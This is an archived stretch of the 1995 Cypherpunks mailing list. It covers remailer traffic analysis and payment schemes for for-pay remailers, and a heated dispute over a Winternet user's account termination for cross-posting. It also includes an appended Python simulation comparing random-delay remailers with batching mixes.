| > and other merchandise, an eavesdropper would have a fairly good source
| > of traffic data on your remailer users, especially since buying and using 
| > remailer service requires two messages within an hour or so.

| Well, I think low-volume remailers are always a bit vulnerable to
| traffic analysis attacks, aren't they?    One thing you could do is
| build a variable time-delay into the remailer, to make it harder to
| correlate messages coming in with those going out.  To take paranoia a
| step further, you could allow people to encrypt their mail TO an
| anonymous remailer with the remailer's public key, and let the remailer
| send it out unencrypted.

	Time delay does not guarantee mixing, which is the intent of
time delay schemes.  Might as well mix directly, since that's what
you're trying to accomplish.  Someone (I think it was Hal) wrote up a
message describing the math involved.  And I don't think encrypting
the various parts of a remailer chain is very paranoid; I don't
particularly trust the remail ops not to read my mail.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume
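
Added example (not part of the message above or of the list archive): a constructed simulation of the reply's point that a time delay does not guarantee mixing, comparing a remailer that holds each message for a random time with one that batches a fixed number of messages before sending. The traffic rate, delay bound and batch size are assumed values, chosen so that both designs have the same average latency.

```python
import bisect
import random
from statistics import mean

def poisson_arrivals(rng, rate_per_hour, count):
    """Arrival times in hours for `count` messages at a low, random rate."""
    now, times = 0.0, []
    for _ in range(count):
        now += rng.expovariate(rate_per_hour)
        times.append(now)
    return times

def delay_remailer(arrivals, max_delay, rng):
    """Hold every message for an independent uniform delay in [0, max_delay]."""
    return [a + rng.uniform(0.0, max_delay) for a in arrivals]

def threshold_mix(arrivals, batch_size):
    """Queue messages until batch_size are waiting, then send them together.

    Order inside a flush is assumed shuffled, so it tells the observer nothing.
    Messages in a trailing partial batch are never sent (departure None).
    """
    departures = [None] * len(arrivals)
    for start in range(0, len(arrivals) - batch_size + 1, batch_size):
        flush_time = arrivals[start + batch_size - 1]
        for i in range(start, start + batch_size):
            departures[i] = flush_time
    return departures

def delay_candidates(arrivals, depart, max_delay):
    """Observer's view: any arrival in the max_delay window before depart."""
    lo = bisect.bisect_left(arrivals, depart - max_delay)
    return bisect.bisect_right(arrivals, depart) - lo

def mix_candidates(arrivals, depart, flush_times):
    """Observer's view: arrivals after the previous flush, up to this one."""
    k = bisect.bisect_left(flush_times, depart)
    lo = bisect.bisect_right(arrivals, flush_times[k - 1]) if k else 0
    return bisect.bisect_right(arrivals, depart) - lo

def summarize(set_sizes, latencies):
    """Anonymity-set statistics plus the latency price paid for them."""
    return {
        "min_set": min(set_sizes),
        "mean_set": mean(set_sizes),
        "traceable": sum(s == 1 for s in set_sizes) / len(set_sizes),
        "mean_latency_h": mean(latencies),
    }

def simulate(seed=1995, rate_per_hour=2.0, max_delay=2.0, batch_size=5,
             count=2000):
    """Run both designs over the same constructed traffic."""
    rng = random.Random(seed)
    arrivals = poisson_arrivals(rng, rate_per_hour, count)

    d_out = delay_remailer(arrivals, max_delay, rng)
    delay = summarize(
        [delay_candidates(arrivals, t, max_delay) for t in d_out],
        [t - a for a, t in zip(arrivals, d_out)],
    )

    m_out = threshold_mix(arrivals, batch_size)
    flushes = sorted({t for t in m_out if t is not None})
    sent = [(a, t) for a, t in zip(arrivals, m_out) if t is not None]
    mix = summarize(
        [mix_candidates(arrivals, t, flushes) for _, t in sent],
        [t - a for a, t in sent],
    )
    return delay, mix

if __name__ == "__main__":
    for name, stats in zip(("random delay", "threshold mix"), simulate()):
        print(name, {k: round(v, 3) for k, v in stats.items()})
```

At equal average latency the two designs give a similar average candidate set, but only the batching design has a floor: under random delay some messages pass through with no other traffic in their window and are trivially matched.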




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 6 Jan 95 14:19:53 PST
To: Jonathan Rochkind <jrochkin@cs.oberlin.edu>
Subject: Re: for-pay remailers and FV (Was Re: Remailer Abuse)
In-Reply-To: <ab336511060210049dfa@[132.162.201.201]>
Message-ID: <Pine.3.89.9501061416.A7987-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 6 Jan 1995, Jonathan Rochkind wrote:

> Hmm. Maybe I don't completely understand how this is going to work, but
> won't _every_ remailer in the chain need to know your FV billing account?

First remailer knows you and your FV billing account.  Charges you
its own fee and the fee for all for profit remailers in the list.
(The envelope states what this fee is going to be) 

Second remailer charges first remailer.

Third remailer charges second remailer.

If the postage on the envelope is insufficient to cover all
the for profit remailers the message passes through, it gets
bounced or dropped.

In principle it could work, 

But blinded digital cash makes it a lot easier.  (blinded 
postage stamps)

I would not try to implement it.  Too much like hard work, for
an unnecessarily complex solution.

 ---------------------------------------------------------------------
We have the right to defend ourselves and our
property, because of the kind of animals that we        James A. Donald
are.  True law derives from this right, not from
the arbitrary power of the omnipotent state.            jamesd@netcom.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 11:16:09 PST
To: Nathaniel Borenstein <cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <ab3346570002100465bb@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:28 AM 01/06/95, Nathaniel Borenstein wrote:
>Again, this comes down to definitions of anonymity.  In this case, if
>you start from the silly assumption that the anonymous remailer actually
>keeps records that correlate messages to payment mechanisms, Doug is
>right, but barely.  To break the anonymity, you'd need collusion between
>the operator of the anonymous remailer AND First Virtual, because the
>former knows which account sent a message, and the latter knows who that
>account belongs to.  (And before you tell me that this sounds a lot like

While this might be secure enough for some people, it is important to note
that it definitely is less secure than the current free remailer net.
Currently, if I send my message through 10 remailers, many more than just
two of the operators need to cooperate in order to get my true identity.  I
think that at least 8 or 9 of them do, actually.
In a First Virtual payment-scheme remailernet, no matter how many remailers
I send my message through, any _one_ operator, together with First Virtual,
can burst my anon bubble.

I suppose this still might be enough security for some people.  After all,
penet is enough security for some people.  But I'd guess that most people
using cypherpunks remailers instead of Julf's penet remailer aren't going
to be willing to settle for it, because it doesn't give you very much more
security than penet.  My trust of Julf, who has an amazingly good
reputation on the net and furthermore isn't in the U.S. (and presumably
isn't subject to U.S. government coercion), certainly isn't any less than
my trust of First Virtual. And if I'm still sending through 10 remailers,
which I'd be doing for traffic analysis reasons, any _one_ of them,
together with FV, can compromise me.  Weakest link in the chain.  Which
means my risk _rises_ with increased remailer chain length. If I was
willing to accept that level of risk, I'd just use penet which is much more
convenient.

The First Virtual method does seem possible for Julf's remailer, since
users pretty much already trust Julf completely, so the Julf+FV system
isn't any less secure than the just Julf system.   But it's just not
anonymous enough for cypherpunks-style remailers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "david d `zoo' zuhn" <zoo@armadillo.com>
Date: Fri, 6 Jan 95 12:38:39 PST
To: cypherpunks@toad.com
Subject: Re: Carol Anne - C'Punk Poster Person?
Message-ID: <199501062040.OAA06369@monad.armadillo.com>
MIME-Version: 1.0
Content-Type: text/plain



I don't think there's much of a case for 'poster child' status involved.  

Users on the Winternet systems (of which I happen to be one) sign an
Agreement stating that they'll abide by Netiquette whenever using internet
services.  Failure to do so can result in termination of service.  This is
Mike's way to limit the amount of time he has to spend dealing with users
who generate flamage.  There was [apparently] another issue involving
reselling of service that I don't have details on, but which is likely to
be related.

Where's the censorship?  I don't see it.  CarolAnne is free to make
whatever statements she likes (since she has service from another
provider).  The New York Times doesn't have to allow me to put an article
on page one (much as I might wish to do so).  That's not censorship either.
No one is obligated to provide a soap box for someone to stand on.

This is a free market issue, not free speech.  Since there is competition
in the local area, people are free to choose whichever provider they like.
Some have more explicit AUP's than others.  Some probably haven't even
considered the issue.  There's no one crying "Foul!  Begone from the net
forever".  THAT would be censorship.  But this is a case of "You're not
following my rules.  Be gone from my machine."

I've got my own setup at home, mostly independent of network provider and
becoming more so as time progresses, to prevent J. Random Sysadmin from
cutting me off arbitrarily.  It costs more money this way, but that's not
entirely unreasonable.  

I'd rather see a market of half a dozen or more providers in any given
area, each mostly independent, providing a number of choices as to service
levels and policy expectations, instead of a monolithic Micro$oft (or AOL
or CI$ or Delphi or etc) "We ARE the Internet" where censorship (in the
traditional definition of someone vetting any public [or private!]
postings) is much more common.

I could see a market for service where someone who decided to armorplate
their machine could provide service to those who persist in doing
"net.stupid.things".  Provide anonymous accounts on that machine, and
remailer accounts, and such, and then stand back and ignore all of the
flamage that will come the way of root|postmaster|usenet|whatever.

[ Personally, I'd likely put that domain into my global killfiles, but
  that's selective reading, not censorship.  ]

[ More disclaimers -- I don't represent Winternet in any way, nor Mike
  Horwath nor CarolAnne Braddock.  I have no connection with Winternet
  except as a customer.  I speak solely for myself and Armadillo Zoo
  Enterprises. And I'm not afraid of an electronic stalking prosecution. ]


  -- 
  -  david d `zoo' zuhn  -| armadillo zoo software -- St. Paul, Minnesota
  --  zoo@armadillo.com --|   unix generalist (and occasional specialist)
  ------------------------+   http://www.armadillo.com/ for more information
    pgp key upon request  +----------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nelson@crynwr.com (Russell Nelson)
Date: Fri, 6 Jan 95 12:08:18 PST
To: jrochkin@cs.oberlin.edu
Subject: Re: Remailer Abuse
In-Reply-To: <ab3346570002100465bb@[132.162.201.201]>
Message-ID: <m0rQL1Q-0008ZFC@crynwr.crynwr.com>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Fri, 6 Jan 1995 14:19:07 -0500
   From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)

   In a First Virtual payment-scheme remailernet, no matter how many remailers
   I send my message through, any _one_ operator, together with First Virtual,
   can burst my anon bubble.

Why?  Why wouldn't the FV remailers use settlements?  At the end of
the month, everyone settles accounts in re who gets what fraction of
what.  No logs are needed other than counters.

-- 
-russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bshantz@spry.com
Date: Fri, 6 Jan 95 15:35:54 PST
To: cypherpunks@toad.com
Subject: The Carol Anne Controversy
Message-ID: <199501062336.PAA12592@homer.spry.com>
MIME-Version: 1.0
Content-Type: text/plain


C'Punks,

Well, folks, this has certainly been an exciting SPAM/FLAME war we've been 
watching.  I've personally enjoyed skipping a good portion of the text of the 
messages and just watching the headers continue to grow in size as more and 
more people have been added to the CC list.  Although, I must admit that I 
enjoyed the Winternet Sysadmin's Rebuttal.

Between this and Matt's article about being an international arms courier 
(Great Article Matt!!!) I've discovered my own answer to the Soap Operas I 
miss while I'm at work every day.

Think I'll go make some popcorn and sit back to watch the fireworks some more.

-- Brad






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carol Anne Braddock  <carolann@mm.com>
Date: Fri, 6 Jan 95 13:35:58 PST
To: Russell Nelson <nelson@crynwr.com>
Subject: Re: Remailer Abuse
In-Reply-To: <m0rQL1Q-0008ZFC@crynwr.crynwr.com>
Message-ID: <Pine.3.89.9501061536.D13809-0100000@downburst.mm.com>
MIME-Version: 1.0
Content-Type: text/plain



Yes Russell, you hit the nail on the head. It's all about trust.

On Fri, 6 Jan 1995, Russell Nelson wrote:
> what.  No logs are needed other than counters.
> 
> -- 
> -russ <nelson@crynwr.com>    http://www.crynwr.com/crynwr/nelson.html
> Crynwr Software   | Crynwr Software sells packet driver support | ask4 PGP key
> 11 Grant St.      | +1 315 268 1925 (9201 FAX)  | What is thee doing about it?
> Potsdam, NY 13676 | What part of "Congress shall make no law" eludes Congress?
> 

Signature withdrawn at the request (pretty rightfully 
so) of my dear friends on the Cypherpunk List 
Coming Soon: The Internet Debut of CENSORED.COM





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
Date: Fri, 6 Jan 95 12:39:26 PST
To: cypherpunks@toad.com
Subject: Re: Remailer Abuse
Message-ID: <ab33592305021004d062@[132.162.201.201]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:12 PM 01/06/95, Russell Nelson wrote:
>   Date: Fri, 6 Jan 1995 14:19:07 -0500
>   From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)
>
>   In a First Virtual payment-scheme remailernet, no matter how many remailers
>   I send my message through, any _one_ operator, together with First Virtual,
>   can burst my anon bubble.
>
>Why?  Why wouldn't the FV remailers use settlements?  At the end of
>the month, everyone settles accounts in re who gets what fraction of
>what.  No logs are needed other than counters.

Oh, you're suggesting that I'd only actually pay the first remailer on my
chain, and at the end of the month he'd pay some of the money I (and
others) paid him to all of the other remailers he transacted with over the
month?  I hadn't thought of that, but now that I do, I can see several
problems arising.

1) The initial remailer has no way of knowing how many subsequent links
there are in the chain, and so doesn't know if I've paid him enough to
reimburse everyone else.  I can easily cheat. He also doesn't know _who_
the subsequent chains are. He can deduct one "stamp" from the amount, and
forward the rest on to the next remailer, and trust them to do the same,
but if I'm cheating there won't be enough to make it to the end of the
chain.  Both of these facts (initial op doesn't know how long the chain
will be, or who will be on it) are essential to the security I get from
using anon remailers, so even if they could be "fixed", it would be bad to.


2) This system requires a good deal of cooperation and organization among
remailer operators. They've got to agree to send each other the proper
amount of money, they've got to set up policies for what the proper amount
of money is, they've got to stay in relatively constant contact to keep
everything running smoothly.   In effect, a remailers trade association is
created, and if I want to use any of the remailers in that group, I've got
to use _only_ remailers in that group in my chain.  I'd rather use a chain
of remailers which aren't associated that closely, hopefully don't even
know each other, and possibly some of which only exist for a short period
of time (guerilla remailers, a risk if I'm paying, in that I can't
necessarily trust them not to steal my money, but if the money I'm paying
is something like $.05 to each remailer, not a real serious risk).
Assuming that there will be some free as well as some charging remailers,
I'd also like to use some of each in my chain.  I see some problems with
the Remailer Trade Association allowing those transactions to happen.
(will they accept incoming mail from a non-affiliated remailer, which surely
won't be paying them at the end of the month?  Surely not, which means if I
use any affiliated remailers in my chain, no affiliated remailers can come
afterwards. So all affiliated remailers I'm using have to come before all
non-affiliated remailers, which is an undesirable restriction which could
aid traffic analysis. If there are several affiliations, things get even
more complicated.)

There are probably other problems too, that I haven't thought of yet.  An
FV-style system doesn't seem to do the trick.  And it isn't an issue of
certain sacrifices you have to make in order to set up for-pay remailers,
as a Chaum digicash based for-pay remailer system would work admirably, and
none of my objections would apply to it.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Gillogly <jim@acm.org>
Date: Fri, 6 Jan 95 15:57:26 PST
To: cypherpunks@toad.com
Subject: Re: floating point crypto?
In-Reply-To: <v01510105ab333d693cc6@[199.0.65.105]>
Message-ID: <199501062358.PAA22404@mycroft.rand.org>
MIME-Version: 1.0
Content-Type: text/plain



> rah@shipwright.com (Robert Hettinga) writes:
> Nonetheless, I *am* thankful to Jim Gillogly, who sent me a great bunch of
> stuff about what the pentium.whistleblower, Dr. Nicely, was working on. Jim
> said he got it out of WWW, and maybe he'll post the URL here and that will
> be that. Nicely was working with finding multiple primes: Prime twins,
> prime triplets, etc.

The page is titled "The Pentium Papers": http://www.mathworks.com/README.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 6 Jan 95 13:15:51 PST
To: nelson@crynwr.com
Subject: Re: Remailer Abuse
In-Reply-To: <28351.789422888.1@nsb.fv.com>
Message-ID: <Ij3P7Kn0Eyt5AxI6Zx@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 6-Jan-95 Re: Remailer Abuse nelson@crynwr.com (779)

>    From: jrochkin@cs.oberlin.edu (Jonathan Rochkind)

>    In a First Virtual payment-scheme remailernet, no matter how many remailers
>    I send my message through, any _one_ operator, together with First Virtual,
>    can burst my anon bubble.

> Why?  Why wouldn't the FV remailers use settlements?  At the end of
> the month, everyone settles accounts in re who gets what fraction of
> what.  No logs are needed other than counters.

I hate to say it, because I generally tend to take the pro-FV side of
most arguments :-), but I think Jonathan's closer to the mark in this
case.  If mail goes through ten remailers, and they ALL charge via First
Virtual, then the last one in the chain won't have to know who you are,
but it will have to know your FV billing account.  Thus it, together
with FV, has enough information to break anonymity.

This is NOT the same as saying that ANY one operator, together with FV,
can burst anonymity; it means that the last one + FV can do so.  I
think, however, that you'd need to break into the last one to get enough
information to allow the next-to-last one to figure out the right FV-id.
 (This assumes that you're tracing the message from its ultimate
destination, not monitoring traffic as it passes through the remailers
-- in the latter case, Jonathan is probably right on the mark.)

Personally, for my taste this is sufficiently anonymous for any
reasonable purpose.  HOWEVER, I can imagine how to make it even more
anonymous.  Imagine that there are ten for-profit anonymous remailer
operators who form an "anonymous remailers consortium".  Each of them
operates TWO remailers, a for-pay one and a free one, but the free one
will only take things that have come directly via some consortium
member's anonymous remailer, so your message has to be paid for once, at
the entry point to the overall system.    Now you can build up a chain
that STARTS with a payment, but then threads its way through a bunch of
less traceable systems, where the operators can't give tracing
information even under court order.  The consortium members would
probably have to agree to some revenue sharing arrangements, but you
could make this work.  

I think this level of engineering is overkill -- for my personal level
of paranoia, I would settle for a single for-pay anonymous remailer
located in a country with very different laws than those that governed
the payment system.    Such a system would probably be "breakable" for
the legal pursuit of genuine terrorists, but not for government
harassment of political dissidents, closet gays from conservative
countries, pornographers, etc.   I guess my basic assumption is that
while any given government can not be trusted with too much power, if
you can't distribute your trust for such things across several very
different governments, human freedom may be a lost cause in the long run
anyway.  -- Nathaniel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 6 Jan 95 16:10:51 PST
To: cypherpunks@toad.com
Subject: Re: Files and mail
In-Reply-To: <m0rQMsX-000SwxC@icicle.winternet.com>
Message-ID: <199501070010.QAA02210@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


drechsau@winternet.com (Mike Horwath) carefully explains all the
reasons why it is better to have a Netcom account than a
Winternet account!

 > I was going to be in, I decided to rest instead.  So sue me
 > for it.

Big providers like Netcom have many employees and many machines.
Things do not screech to a halt when "the guy who owns the
machine" takes a mental health day. :)

 > Talk about net.good.will...you stole service after it was
 > suspended.

Free service offered to the public cannot be stolen, even by
prior dissatisfied customers.  Big providers like Netcom don't
care if someone they don't like logs onto the machine again as
"guest".

 > Tuesday, after being up for 20+ hours and getting a couple
 > hours sleep, you call ... Again, sue me, this time for being
 > tired.

Service at big providers like Netcom doesn't slack off when "the
guy who owns the machine" misses his nap...

 > Wednesday, I was going to be into work, which you assumed I
 > would be, ... I decided I was going to take that day off ...

...or when "the guy who owns the machine" goes fishing...

 > The machine being down was not used as an excuse, but it is
 > hard to operate like we used to with only one user machine.

...or when "the machine" is broken.

 > That is 2 counts in 2 days (notified on monday, early, of
 > the spamming, notified on wed of the mass unsolicited
 > mailings).  Sorry, someone had to put their foot down, and
 > it happened to be us.

Big service providers like Netcom don't interfere with customer
use of the resources they sell, except when network functionality
is impacted.  Even in such cases, they try to reach an
understanding with the user, and terminate accounts only as a
last resort.  Accounts don't vanish when "the guy who owns the
machine" decides to throw a tantrum.

 > It was inappropriate for the groups that you posted to.

Big providers like Netcom don't pass editorial judgment on the
content of material posted by their customers.

 > Sorry Carol Anne, but this is a system I administer and I
 > use the AUP to protect all of us across the 'net.

I am sure we will all sleep more soundly knowing that Mike
Horwath and his tiny pimple of a machine on the Internet are
"protecting" us.

 > We had talked about the winternet t-shirts and how we would
 > use the work you did and the monies you would receive as
 > payment.

Big providers like Netcom don't make silly little deals with
customers for T-shirts...

 > Well, no t-shirts have gone out and at this time, I will be
 > cancelling all orders for them and will redesign them and
 > have them produced externally to what you have done.  This
 > is what happens when you hold something over someone's head.

...or cancel those agreements out of spite when they don't get
everything done their way.

You know, I used to use BBS systems a great deal before large
providers like Netcom began offering personal accounts with
Internet access at reasonable rates.  A BBS is about as far from
a common carrier as one can get, and many Sysops disclaim all
your rights under the ECPA, read private mail, forbid the use of
PGP, decide what opinions may be expressed on various issues, and
boot off any user who questions anything they do.  Since the
Sysop owns the machine, they are legally within their rights to
act like this, and as long as there are enough users who will put
up with their behavior, they can run a system.

Now that Unix boxes are not much more expensive than PCs used to
be, every asshole in the world who played Sysop on a BBS now
envisions himself as Sysadmin of an ISP.  So you have an
infestation of tiny service providers, running on toy machines,
that coast along for a few years until the person running them
either goes bankrupt or gets bored.  I certainly wouldn't
subscribe to one of these services, because the management
mentality and problematical service most of them provide is
exactly what I came to Netcom to get away from.

Quite frankly, I don't see why Carol doesn't just get a Netcom
account and stop quibbling with this twit.  Stop letting him
waste any more of your time and let him play his administrative
power games with newbies who don't know any better.

My two cents.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: drechsau@winternet.com (Mike Horwath)
Date: Fri, 6 Jan 95 14:12:55 PST
To: carolann@mm.com
Subject: Re: Files and mail
In-Reply-To: <Pine.3.89.9501060725.A12518-0100000@downburst.mm.com>
Message-ID: <m0rQMsX-000SwxC@icicle.winternet.com>
MIME-Version: 1.0
Content-Type: text


[This is hopefully going to be my only message on this matter, questions
or comments, just reply to me directly]

> A written reply will suffice.
> You have my permission to make all of my files world readable.
> You can put them in the ftp site.

Since you are posting this to so many people, they can all see my
reply.

And this is a written reply :)

> Upon receipt of notice, they will be removed within 24 hours,
> and you will receive a signed PGP statement with the new key,
> stating that the files have been removed. Other Winternet users have
> already gone to my defense, and copied all of the world readable
> material anyway. And the whole account might as well be, too.

Fine, when I have things packed up, they will be moved and you will
be notified.

> Please do not forward any mail here. You will better serve yourself 
> bouncing the letter back to the sender and informing them of my new
> address. If I find forwarded mail in my mailbox, I will print hard
> copies and visit the Attorney General's Office and file a complaint
> under the Stalking laws of the State of Minnesota.

You can either take the alias in my alias database or have no forwarding
address left, that is your choice.  We are courteous enough to forward
for you, take it or leave it.

And stalking laws?  I don't think so.  There is a difference in
notification and stalking and my email to you is far from stalking.

> And please...deactivate my WWW pages. I was astounded to find out
> that during the suspension, they continued to remain active, as I
> learned in the office Wednesday. That was (and still is) stealing my 
> net.web.goodwill, and creating a falsehood amongst other users.

They were left there because they are of use to the 'net and until
I could hear from you what you wanted done with your files, there was
no need to remove the WWW pages or your account.

Now that we have your decision, everything will be removed.

And stealing?  You had them up for public consumption for many weeks.
Did everyone who touched your page steal then?

So, no, no advantage was taken by us via your WWW pages.

> I spent six full hours making a personal appearance, at great 
> personal expense, to the Winternet Office to resolve the situation.

Great personal expense?  This is going to be fun.

I don't think harassing Chad (my intern) or Doug (my roommate) for
6 full hours a very nice thing to do at all.  If you had wanted to 
meet me there, you could have had one of them call me, or if they
did not have the number for where I was at that day (which happened
to be my first complete day off in a few weeks), you could have
dropped me email stating you were at the office to discuss this.  I
was only 10 minutes away at a friend's house to escape work.  I am
pretty sure they told you I was taking a day off after they found
out from me.  I was going to be in, I decided to rest instead.  So
sue me for it.

No Carol Anne, you did not have any 'great personal expense', what
you did do was impose yourself on two people for 6 hours.

You also then used our basic login on our console machines, which
is there for when people come to visit, to post messages to UseNet
and to send and receive email.  Not very nice now is it?  When service
was suspended, it meant all service, not just your account on the
main machines.

Talk about net.good.will...you stole service after it was suspended.

> My original reply still sits in suspended composition in my mailer. I 
> wasted not a nano-second in preparing my reply to the posting. In legal
> point of fact, the poster is in violation of Minnesota State Law. He has
> no legal jurisdiction whatsoever.

What are you talking about now?

I hope you don't think I am taking legal action for something, because
that would be just funny to hear.  Your account was terminated for a
breach in our AUP, not because you caused me or Winternet harm.

> I did not take days to "investigate", nor cite that other things such as
> "my machines being hacked" and "I'll do it when I'm ready to do it,".

First day, monday, when I suspended your account, you did not even feel
it was reasonable to call me when I had written a message to your screen
explaining that we needed to talk.

Tuesday, after being up for 20+ hours and getting a couple hours sleep,
you call and harass me at home even more about the status of your
account.  I told you I wanted to investigate these instances and that
I did not have the time because I was dealing with some hackers who
had tried to break in.  Again, sue me, this time for being tired.

Wednesday, I was going to be into work, which you assumed I would be, 
but did not bother to call to make sure I was around.  I decided I
was going to take that day off I had been trying to take and did
NOT find out you were in the office until late afternoon Wed.  I asked
Chad and Doug why you were there, and they said they did not know.  If
you had wanted to see me to talk about this, you should have spoken
up.

The machine being down was not used as an excuse, but it is hard to
operate like we used to with only one user machine.  This is a piece
of stress on me, which was never taken out on you or on any other
user.

> I was a simple complaint. It had no validity. Crossposting an article to
> .1% of the Usenet News Groups does not by the very statistic constitute 
> spam. (And I own two shares of Hormel Corp, so I do know what SPAM (tm) is.

What you consider spamming, and what others do, are two different things.
I explained my views, you have seen our AUP, and it was in my judgement,
and later, after talking with my peers, their judgement, that things
had gone too far.

Should I also bring to light your unsolicited mailings you did to users
on Winternet and others out to the 'net?  Remember those?  Something
about selling web pages from your account, which I had told you I would
rather you did not do, very politely I might add.  Or what about the
net cash mass mailing you did to people?

That is 2 counts in 2 days (notified on monday, early, of the spamming,
notified on wed of the mass unsolicited mailings).  Sorry, someone had
to put their foot down, and it happened to be us.

> The crossposting wasn't wasting resources.

It was inappropriate for the groups that you posted to.

> It is of no one's concern the actual groups posted. 

It is when others have to read it.

> They have the right and ability to respond.

And they did, both to you, you have stated, and to me, as the admin
of Winternet.

> I asked for no money. I did not stand to profit by the posting.

That doesn't matter, it was still inappropriate to post this message
to the groups you posted to.

> The person who started the whole thing was pretty heavily chastised,
> by the readers of his own news group.

Huh?

> A fast "K" was all that any individual needed for this article.

Uhuh, we could have done that for C&S also, but it would not have
helped.

> No, Mr. Horwath, you are "way out-of-bounds" this time.
> And as the time chronology unveils itself, I am sure that 
> will be shown to be a very truthful, factual statement.

Sorry Carol Anne, but this is a system I administer and I use the AUP
to protect all of us across the 'net.  This was not an attack against
you.  You were not judged unfairly.  What you did was break our agreement
and for this, you lost your service.

Also, you hadn't paid for your account for over 10 weeks, so why are you
bitching so much anyway?  We had talked about the winternet t-shirts
and how we would use the work you did and the monies you would receive
as payment.  Well, no t-shirts have gone out and at this time, I will
be cancelling all orders for them and will redesign them and have them
produced externally to what you have done.  This is what happens when
you hold something over someone's head.

> Dangerous precedents were set here. I will not rest until the 
> whole of the Internet knows and is aware of the situation.

Then spam again, Carol Anne.

> Signed
> Carol Anne Braddock
> Friday January 6th, 1995 9:40 A.M.


> On Fri, 6 Jan 1995, Mike Horwath wrote:
> 
> > You are welcome to your files and mail, I will pack everything up for
> > you as you left it, including your FTP area.
> > 
> > I expect you to try to reach me today in the afternoon at my office and
> > I will fully explain why your account was deleted, with full detail as
> > to why.
> > 
> > I do appreciate the work you did on the shirts for Winternet.  I don't
> > appreciate the harassment you have already tried to bring upon me.
> > 
> > When we talk, I think you might understand why this was done.  If you do
> > not, then I feel bad, as I must then not be making myself clear.  But
> > no matter what, this was policy that you chose to break even after I 
> > had talked to you about it.  More on this when we talk.
> > 
> > Good luck at your new provider, Larry Leone is an old user of mine and
> > seems to be a good guy, even if a little quiet on the newsgroups :)
> > 
> > A copy of this letter is also going to your new admin so that he knows
> > what is going on.
> > 
> > Larry, Carol Anne was using about 11.5MB of disk that will be moving
> > over from Winternet to MM.
> > 
> > Also, how have you been anyway?  Been awhile since I saw you.  Oh, and
> > could you install identd on your system?  Get back to me on anything,
> > or with questions.
> > 
> > -- 
> > Mike Horwath    IRC: Drechsau    LIFE: Lover     drechsau@winternet.com
> > Winternet:  info@winternet.com              root@jacobs.mn.org <- Linux!
> > Twin Cities area Internet Access:  612-941-9177 for more info
> > Founding member of Minnesota Coalition for Internet Accessibility

[all previously included messages left intact]

-- 
Mike Horwath    IRC: Drechsau    LIFE: Lover     drechsau@winternet.com
Winternet:  info@winternet.com              root@jacobs.mn.org <- Linux!
Twin Cities area Internet Access:  612-941-9177 for more info
Founding member of Minnesota Coalition for Internet Accessibility



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mpd@netcom.com (Mike Duvos)
Date: Fri, 6 Jan 95 16:20:05 PST
To: cypherpunks@toad.com
Subject: Re: All I did was properly crosspost!
In-Reply-To: <9501062310.AB20311@eri.erinet.com>
Message-ID: <199501070020.QAA03416@netcom10.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



> The discussion on alt.current-events.net-abuse seemed to indicate that the 
> claim of "Just 10" above is a slight understatement.  The newsgroups seem to 
> have been hit alphabetically, and I believe the total count was in the hundreds.
> 
>     --Paul J. Ste. Marie
>       pstemari@well.sf.ca.us, pstemari@erinet.com

The individual who posted the first hysterical message about Carol's
alleged spam in a.c-e.n-a leaped to the conclusion that it was being
posted to a large number of groups because one of the newsgroups posted
to had a very low ordinal in the alphabetical list of all newsgroups.

The message itself, which he quoted, was only cross-posted to the
10 newsgroups specified.  I believe the CancelMoose threshold for an
official spam is 50 newsgroups.

-- 
     Mike Duvos         $    PGP 2.6 Public Key available     $
     mpd@netcom.com     $    via Finger.                      $




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathaniel Borenstein <nsb@nsb.fv.com>
Date: Fri, 6 Jan 95 13:21:06 PST
To: jrochkin@cs.oberlin.edu
Subject: Re: Remailer Abuse
In-Reply-To: <1185.789426406.1@nsb.fv.com>
Message-ID: <4j3PEYr0Eyt5IxI7VW@nsb.fv.com>
MIME-Version: 1.0
Content-Type: text/plain


Excerpts from mail: 6-Jan-95 Re: Remailer Abuse jrochkin@cs.oberlin.edu (3378*)

> 1) The initial remailer has no way of knowing how many subsequent links
> there are in the chain, and so doesn't know if I've paid him enough to
> reimburse everyone else.  I can easily cheat. 

This depends entirely on your definition of "cheating".    Basically, my
proposal (which I think crossed in the mail with yours, so I'm not
claiming that you misunderstood it -- in fact you anticipated *most* of
it, I think) was to charge once for entry to the "system", and to
